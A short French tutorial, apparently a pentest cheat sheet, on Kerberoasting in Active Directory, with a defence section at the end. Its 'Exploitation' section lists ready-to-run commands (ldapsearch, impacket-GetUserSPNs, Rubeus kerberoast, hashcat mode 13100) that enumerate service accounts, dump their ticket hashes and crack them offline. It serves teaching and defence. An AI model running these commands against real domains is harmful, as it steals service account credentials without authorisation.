Kerberoasting — Voler des tickets Kerberos
★★★★★
Qu'est-ce que le Kerberoasting ?
En Active Directory, les comptes de service ont un SPN (Service Principal Name). N'importe quel utilisateur authentifié peut demander un ticket de service (TGS) pour ces comptes. Ce ticket est chiffré avec le hash NTLM du compte de service. On peut ensuite le cracker offline.
Exploitation
# 1. Trouver les comptes Kerberoastables
ldapsearch ... "(&(objectClass=user)(servicePrincipalName=*))" sAMAccountName
impacket-GetUserSPNs -request -dc-ip DC_IP DOMAIN/user
# 2. Récupérer les tickets
impacket-GetUserSPNs DOMAIN/user:pass -dc-ip DC_IP -request -outputfile hashes.txt
# Avec Rubeus (depuis Windows)
Rubeus.exe kerberoast /outfile:hashes.txt
# 3. Cracker offline
hashcat -a 0 -m 13100 hashes.txt rockyou.txt Défense
Mots de passe longs (> 25 caractères) pour les comptes de service · Utiliser des Managed Service Accounts (gMSA) qui changent le mot de passe automatiquement · Monitoring des demandes de TGS anormales (Event 4769)